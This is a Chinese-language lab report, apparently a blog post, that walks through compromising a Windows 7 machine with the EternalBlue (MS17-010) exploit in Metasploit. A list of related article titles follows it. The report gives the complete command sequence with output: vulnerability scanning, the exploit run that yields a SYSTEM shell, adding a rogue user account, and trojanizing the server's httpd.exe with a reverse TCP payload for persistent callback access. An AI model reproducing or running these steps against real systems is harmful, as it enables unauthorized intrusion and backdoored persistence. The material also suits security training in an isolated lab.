实验名称:利用永恒之蓝渗透win7

实验人:xx

实验日期:2021.9.24

实验目的:通过已知漏洞攻击目标服务器并拿到shell

实验环境:

kali:172.16.12.30

win7靶机:172.16.12.4 用户名:administrator 密码:vgrant

实验步骤:

配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled

查看MS17-010相关模块,并使用序号3扫描模块扫描目标及

msf6 > search ms17-010

msf6 > use 3

查看模块参数并设置目标机IP,执行扫描,未发现相关漏洞

msf6 auxiliary(admin/smb/ms17_010_command) > show options

msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 auxiliary(admin/smb/ms17_010_command) > run

换序号4模块进行扫描,设置目标主机,执行扫描,发现漏洞

msf6 > search ms17-010

msf6 > use 4

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

查找攻击模块,并使用

msf6 > search ms17-010

msf6 > use 0

查看设置模块,并设置目标主机ip,执行run

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

渗透成功

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > pwd C:\Windows\system32

对目标及实施攻击

截取屏幕

创建账户

meterpreter > shell #进入目标机shell

C:\Windows\system32>net user #查看当前账户

创建账户cuiyi

C:\Windows\system32>net user cuiyi /add

创建后门

meterpreter > ps -S httpd.exe

meterpreter > kill 3212 #先杀死进程才能下载,下载后调到后台

meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe

制作后门文件

msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp

msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30

lhost => 172.16.12.30

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe

[*] Writing 29184 bytes to /root/httpd_door.exe...

启动监听,监听后门的反向连接,并用run -j到到后台

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > show options

msf6 exploit(multi/handler) > set lhost 172.16.12.30

lhost => 172.16.12.30

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.12.30:4444

切回之前保存后台的会话,上传后门文件并重命名

msf6 exploit(multi/handler) > sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)

msf6 exploit(multi/handler) > sessions 1

[*] Starting interaction with 1...

meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\

meterpreter > pwd

c:\wamp\bin\apache\apache2.2.21\bin

meterpreter > mv httpd.exe httpd.exe.bak

meterpreter > upload /root/httpd_door.exe

[*] uploading : /root/httpd_door.exe -> httpd_door.exe

[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe

[*] uploaded : /root/httpd_door.exe -> httpd_door.exe

meterpreter > mv httpd_door.exe httpd.exe

重启wampapache服务,服务器启动后,返回了新的会话(最后一行)

exploit/multi/handler 保持监听状态,每当对端的“httpd.exe” 重启,这边就会启动会话

重启wampapache

返回kaili看到成功建立连接

利用永恒之蓝渗透WIN7相关推荐

  1. MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令"msfconsole ",启动Metasploit:输入命令"use auxiliary/scanner/ ...

  2. [网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集.CMS漏洞搜索.D ...

  3. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  4. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  5. 利用永恒之蓝漏洞+修复方法(MS17-010)

    文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...

  6. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  7. MSF之利用永恒之蓝

    永恒之蓝: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚至于2017年5月12日, ...

  8. 记一次MSF永恒之蓝入侵win7系统实验

    目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...

  9. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

最新文章

  1. .pgr照片文件解析,C++与Java存储数据差别大小端模式
  2. 【NLP】 聊聊NLP中的attention机制
  3. Tensorflow Python3 做神经网络(视频教程)
  4. ClassLoader类解析
  5. 微型计算机的构成部件6,谈谈微机的主要部件与指标
  6. C# winform中使窗体最小化(NotifyIcon)
  7. java月利率计算(等额本息贷款)
  8. 彻底解决SysFader:IEXPLORE.EXE应用程序错误
  9. glibc-2.23-free
  10. php微信绑定银行卡_微信开发企业支付到银行卡PHP
  11. Android项目的targetSDK=23,在低于Android6.0的部分测试机(类似华为)上运行时出现的系统权限问题...
  12. 我国有关信息方面的法律法规
  13. wrf模式计算机配置,用WRF模型进行气象模拟入门(2)——WPS的配置与使用
  14. 漫画电子电路读书笔记
  15. android开发 dts、各种接口porting
  16. [2021ICLR]Improve Object Detection with Feature-based Knowledge Distillation 论文笔记
  17. w32tm 排错时间
  18. 【数学】三角形内接平行四边形问题
  19. UE4动画 高级运动系统 AdvancedLocomotionSystemV 解析
  20. 抖音轮播图html代码,抖音上超火的“图片轮播”、“卡点”视频都是怎么做的?...

热门文章

  1. 黑莓手机OTA在线下载安装软件使用教程
  2. 三菱电梯c语言程序代码破解,三菱电梯LEHY-C故障代码大全
  3. 好和弦-1-基础乐理
  4. 灰度图像的锐化——拉普拉斯算子
  5. 开始有紧迫感了=。=
  6. 2023年你应该关注的JavaScript趋势
  7. 关于 Thu Jun 13 2019 10:41:09 GMT+0800 (中国标准时间) 时间问题的解决
  8. iOS ScrollView的使用教程
  9. 蒸妙熏蒸,让疾病早缓解,幸福生活更容易
  10. Html+Css+js实现带有雪花飘落的许愿墙效果